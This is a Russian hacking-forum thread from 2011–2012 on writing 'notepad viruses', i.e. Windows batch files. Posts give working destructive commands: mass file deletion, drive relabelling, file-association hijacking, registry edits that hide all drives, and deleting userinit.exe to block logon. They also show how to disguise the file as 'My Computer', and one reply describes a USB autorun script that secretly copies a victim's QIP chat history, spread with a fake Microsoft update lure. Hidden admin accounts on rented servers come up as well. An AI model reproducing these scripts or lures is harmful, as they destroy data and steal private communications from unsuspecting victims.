Текущее время: 07:05. Часовой пояс GMT +3.
Ваш баннер

Расширенный поиск
Вернуться   Все секреты безопасного общения в глобальной сети - icq-num.ru > Статьи > Наши статьи

Важная информация

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 29.08.2011, 13:51   #1 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию Вирус в блокноте

Вирус в блокноте

[Ссылки могут видеть только зарегистрированные пользователи. ]


Сегодня изучал снова правила. Ничего связанное с вирусами не нашел, нашел только, что DDOS, фрод и тд - ЗАПРЕЩЕНО. А вот про вирусы ничего написано не было.



В инете очень много различных вирусов, написанных в блокноте, но я постараюсь сделать самый веселый.

итак, начнем откройте блокнот и напишите команду

Вы можете для начала просто создать небольшой батник, например

Пишите слово calc и вставляете его еще раз 500-600

Код:
calc
calc
calc
и сохраняет под названием 1, но с разрешение .bat, а не .txt
И когда юзер запустит его у него загрузятся сразу около 500 калькуляторов (смотря какая ОС, также может быть так то, что загружается один калькулятор, ты его закрываешь, а следом другой.)
Еще есть команда md - создание, mspaint - пейнт

Грустно? Сейчас будет весело)

Теперь начнем

открываем блокнот и пишем @echo off - это команда будет скрывать все, что будет происходить в cmd

copy %0 c:\dikobraz.bat - копирует батник на диск c
copy %0 d:\dikobraz.bat - копирует батник на диск d
copy %0 e:\dikobraz.bat - копирует батник на диск e
copy %0 f:\dikobraz.bat - копирует батник на диск f
copy %0 z:\dikobraz.bat - копирует батник на диск z
copy %0 g:\dikobraz.bat - копирует батник на диск g

примечание. Вы можете создать хоть 26 таких копиров на диски. А мало ли. Вдруг у жертву C называется, как X.

label с: 3DeCb 6bIJl BuPyC - переименовывает диск "с" на 3DeCb 6bIJl BuPyC

Аналогично, делаем ринейм на другие диски

time 13:37 - переустанавливаем время
date 01.01.01 - меняем дату

del d:\ *.* /q - снесем диск d

с диском C не делать такого, удовольствия мало

assoc .exe=.mp3 - переделывает exe в mp3
assoc .doc=.mp3 - переделывает doc в mp3

net user "icq-num" /add - создает пользователя icq-num
net user "dikobraz" /add- создает пользователя dikobraz
exit - выход из батника
сохраняем, как dikobraz.bat


Вопрос.
Как сделать, чтобы пользователь компа его
открыл. Можно конечно объединить c ico в winrare, но мы сделаем, как нубы)

Кидаем батник в папку и скрываем ее, только так, чтобы при скрытие, выбрать тип скрыть папку, но не файл. Перед скрытием создайте ярлык и залейте на рабочий стол. Теперь переименуйте, как мой компьютер и щелкаем свойства папки - > настройка-> сменить ярлык и ищем мой компьютер. Я так на информатике делал)
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Сказали спасибо:
Alkogol , xaker01 , MrPLaM6uP , MicroCip , Absenta , Del[x] , LiLi
Старый 30.08.2011, 22:17   #2 ()
 
Аватар для MrPLaM6uP
Подробнее
Очки: 4,502, Уровень: 42
Очки: 4,502, Уровень: 42 Очки: 4,502, Уровень: 42 Очки: 4,502, Уровень: 42
Активность: 3%
Активность: 3% Активность: 3% Активность: 3%


 
По умолчанию

а есть способ (случай с калькуляторами) что бы командная строка не открывалась?
MrPLaM6uP вне форума

 
Ответить с цитированием
Сказали спасибо:
dikobraz
Старый 30.08.2011, 22:21   #3 ()
 
Аватар для MicroCip
Подробнее
Очки: 5,562, Уровень: 48
Очки: 5,562, Уровень: 48 Очки: 5,562, Уровень: 48 Очки: 5,562, Уровень: 48
Активность: 2%
Активность: 2% Активность: 2% Активность: 2%


 
По умолчанию

Цитата: Сообщение от MrPLaM6uP
а есть способ (случай с калькуляторами) что бы командная строка не открывалась?
В этом не чего сложного, просто:
Код:
@echo off
calc
calc
calc
__________________
За нарушение [Ссылки могут видеть только зарегистрированные пользователи. ] или раздела - 1-й раз устное предупреждение, в последующие разы - Бан
MicroCip вне форума

 
Ответить с цитированием
Сказали спасибо:
dikobraz
Старый 30.08.2011, 22:32   #4 ()
 
Аватар для MrPLaM6uP
Подробнее
Очки: 4,502, Уровень: 42
Очки: 4,502, Уровень: 42 Очки: 4,502, Уровень: 42 Очки: 4,502, Уровень: 42
Активность: 3%
Активность: 3% Активность: 3% Активность: 3%


 
По умолчанию

не не не не не
так мы не видим что происходит в ней, но само ее окно открывается)
я уже попробывал
я имел ввиду что бы даже окно не открывалось?
MrPLaM6uP вне форума

 
Ответить с цитированием
Старый 31.08.2011, 04:34   #5 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию

Del[x], kpeamub, скиньте ссылочку... Я когда тему создавал он мне ничего не высветил


Добавлено через 1 минуту
MrPLaM6uP, ну эт тогда не в блокноте надо писать...
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Старый 12.09.2011, 22:59   #6 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию

Diablomy, ты уже во второй моей теме оффтопишь........и кстати антивирус не спалит
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Старый 25.09.2011, 15:16   #7 ()
 
Аватар для Venom.exe
Подробнее
Очки: 82, Уровень: 1
Очки: 82, Уровень: 1 Очки: 82, Уровень: 1 Очки: 82, Уровень: 1
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Цитата: Сообщение от kpeamub
да что то знакомое
Да таких тем с подобным содержанием на всех форумах навалом
Venom.exe вне форума

 
Ответить с цитированием
Сказали спасибо:
dikobraz
Старый 25.09.2011, 15:32   #8 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию

Venom.exe, Вы считаете, что это бездумный копипаст?
Статья написана мноою.. по моему личному опыту.. Тк, я сам раньше писал такие приколы. Могу скинуть тебе если хочешь
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Сказали спасибо:
LiLi
Старый 29.09.2011, 10:57   #9 ()
 
Аватар для Sani4
Подробнее
Очки: 524, Уровень: 10
Очки: 524, Уровень: 10 Очки: 524, Уровень: 10 Очки: 524, Уровень: 10
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%


 
По умолчанию

то что ты здесь описал это мелкое болавство.
вот еслибы ты сделал подмену с regedit вот тут было бы интереснее.

допустим так
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v HonorAutoRunSetting /t REG_DWORD /d 00000001
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v NoDriveTypeAutoRun /t REG_DWORD /d 0000003c
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v NoDrives /t REG_DWORD /d 67108863

после перезагрузки пропадут все диски
и плюс занести в постоянный запуск чтоб не смог убрать
Sani4 вне форума

 
Ответить с цитированием
Сказали спасибо:
dikobraz , -=ExE=- , LiLi
Старый 30.09.2011, 13:34   #10 ()
 
Аватар для Bandit 01
Подробнее
Очки: 105, Уровень: 2
Очки: 105, Уровень: 2 Очки: 105, Уровень: 2 Очки: 105, Уровень: 2
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%
 
По умолчанию

Еще можно сделать вот такой батник:
Код:
@echo off
delete c:\windows\system32\userinit.exe
После перезагрузки войти в виндовс нельзя. Исправить это можно вернув этот файл назад.
Bandit 01 вне форума

 
Ответить с цитированием
Старый 28.12.2011, 18:28   #11 ()
 
Аватар для -=ExE=-
Подробнее
Очки: 1,744, Уровень: 24
Очки: 1,744, Уровень: 24 Очки: 1,744, Уровень: 24 Очки: 1,744, Уровень: 24
Активность: 1%
Активность: 1% Активность: 1% Активность: 1%
 
По умолчанию

я хочу чтобы батник делал вот так
mstsc -v 188.127.233.10
но как запустил подключения, закрылся
что дописать надо?
-=ExE=- вне форума

 
Ответить с цитированием
Старый 28.12.2011, 21:13   #12 ()
 
Аватар для AndXor
Подробнее
Очки: 1,137, Уровень: 18
Очки: 1,137, Уровень: 18 Очки: 1,137, Уровень: 18 Очки: 1,137, Уровень: 18
Активность: 3%
Активность: 3% Активность: 3% Активность: 3%


 
По умолчанию

напиши
pause
__________________

Наглый и подлый, а иногда нежный и добрый.
Malinovka Style
AndXor вне форума

 
Ответить с цитированием
Старый 28.12.2011, 21:41   #13 ()
 
Аватар для villa 7
Подробнее
Очки: 1,691, Уровень: 23
Очки: 1,691, Уровень: 23 Очки: 1,691, Уровень: 23 Очки: 1,691, Уровень: 23
Активность: 0%
Активность: 0% Активность: 0% Активность: 0%


 
По умолчанию

выложите все свои работы, интересно посмотреть
villa 7 вне форума

 
Ответить с цитированием
Сказали спасибо:
dikobraz
Старый 28.12.2011, 23:18   #14 ()
 
Аватар для anthrax
Подробнее
Очки: 817, Уровень: 15
Очки: 817, Уровень: 15 Очки: 817, Уровень: 15 Очки: 817, Уровень: 15
Активность: 1%
Активность: 1% Активность: 1% Активность: 1%


 
По умолчанию

Ещё давно нашёл такую статью:

Пишем батник
Создавать,батник будем для второй ситуации (она не*много сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:

@Echo off
c:
chdir C:\Program Files\QIP\Users
f:\rar.exe a -r users -r > nul
copy users.rar g:\adc > nul
del users.rar > nul

где

©Echo off - скрывает ви*зуальный процесс копиро*вания.
C:\Program Files\QIP\Users - папка, в которой находится история.
f:\rar.exe а -г users > nul -запуск архиватора для ус*корения копирования.
copy users.rar g:\adc > nul - адрес куда копируем.
del users.rar > nul - удаляет созданный архив на жеском диске.

Не всегда бывает известна бук*ва флеш-диска. В "таком случае прописываем несколько вариан*тов (один уж точно угадаем):

@Echo off
с:
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расши*рение c .txt нa .bat. Это мож*но сделать в Total Commander'e.

Создаем автозапуск
Теперь надо сделать так, что*бы батник автоматически запускался с флешки при под*ключении к компьютеру. Для это*го создаём новый текстовый до*кумент и пишем в нём:

[autorun]
ShellExeCute="xxx.bat"
Сохраняем файл и переимено*вываем его на autorun.inf.

Делаем архив
Далее нам предстоит позабо*тится об архиваторе. QIP-история может быть большая. Что*бы процесс копирования происхо*дил быстрее мы её заархивируем.

Из папки с WinRAR (по умолча*нию C:\Program Files\WinRAR бе*рём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бро*саем остальные три файла (xxx.bat, autorun.inf, rar.exe).

Все файлы скрываем от посто*ронних глаз (правой кнопкой мы*ши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.

Социальная инженерия
Не обязательно делать авто*запуск. "Жертва" сама мо*жет запустить батник. Для этого надо воспользоваться социаль*ной инженерией. Например, со*общаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстро*действие и без*опасность опера*ционной системы. Устанавливать об*новление нужно то*лько с флешки. Можете сами придумать причи*ну, по которой на*до запустить наш батник. Всё зави*сит от вашей фан*тазии и смекалки.
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
anthrax вне форума

 
Ответить с цитированием
Сказали спасибо:
Del[x]
Старый 29.12.2011, 17:11   #15 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию

кстати, ребят, свое мастерство можно отработать на дедиках
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Сказали спасибо:
xaker01
Старый 25.01.2012, 13:48   #16 ()
 
Аватар для LiLi
Подробнее
Очки: 108,608, Уровень: 100
Очки: 108,608, Уровень: 100 Очки: 108,608, Уровень: 100 Очки: 108,608, Уровень: 100
Активность: 100%
Активность: 100% Активность: 100% Активность: 100%


 
По умолчанию

Цитата: Сообщение от TCOooo
а могет кто то написать батник для создания скрытой учетки на дедике?

Лови:
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
__________________
Цитата:
[Ссылки могут видеть только зарегистрированные пользователи. ] ~ [Ссылки могут видеть только зарегистрированные пользователи. ]~ [Ссылки могут видеть только зарегистрированные пользователи. ] ~[Ссылки могут видеть только зарегистрированные пользователи. ]

Актуальные, призовые конкурсы на форуме: [Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ]
LiLi на форуме

 
Ответить с цитированием
Старый 25.01.2012, 17:59   #17 ()
 
Аватар для dikobraz
Подробнее
Очки: 11,593, Уровень: 70
Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70 Очки: 11,593, Уровень: 70
Активность: 17%
Активность: 17% Активность: 17% Активность: 17%


 
По умолчанию

LiLi, я так понимаю эти команды надо писать неизменно? и полностью?

Код:
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
__________________
[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
dikobraz на форуме

 
Ответить с цитированием
Старый 25.01.2012, 23:33   #18 ()
 
Аватар для LiLi
Подробнее
Очки: 108,608, Уровень: 100
Очки: 108,608, Уровень: 100 Очки: 108,608, Уровень: 100 Очки: 108,608, Уровень: 100
Активность: 100%
Активность: 100% Активность: 100% Активность: 100%


 
По умолчанию

dikobraz, Заменить нужно данные на свои (имя учетки и пароль учетки)
Потом поменять расширение на .bat , ну и запустить соответственно)
__________________
Цитата:
[Ссылки могут видеть только зарегистрированные пользователи. ] ~ [Ссылки могут видеть только зарегистрированные пользователи. ]~ [Ссылки могут видеть только зарегистрированные пользователи. ] ~[Ссылки могут видеть только зарегистрированные пользователи. ]

Актуальные, призовые конкурсы на форуме: [Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ].[Ссылки могут видеть только зарегистрированные пользователи. ]
LiLi на форуме

 
Ответить с цитированием
 

Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Создаем вирус xaker01 NeoBook 18 13.04.2011 19:49
Вирус 2012 xaker01 Наши статьи 10 05.01.2011 08:10
html вирус DRAG26 Чужие статьи 1 02.01.2010 03:38


icq-num team




 
 
Материалы, находящиеся на этом ресурсе, были добавлены пользователями сайта, либо найдены в интернете как свободно распространяемые. Если Вы являетесь законным правообладателем той или иной продукции, и условия, на которых она представлена на данном ресурсе, не соответствует действительности, просьба незамедлительно связаться с администрацией сайта с целью устранения правонарушения. Все материалы доступны исключительно для личного пользования в ознакомительных целях и не должны использоваться для последующего распространения или получения коммерческой выгоды. За информацию в рекламных новостях или объявлениях ответственность несет рекламодатель! Копирование авторской информации разрешено лишь с разрешения администрации сайта, с указанием активной гиперссылки на icq-num.ru, как на первоисточник.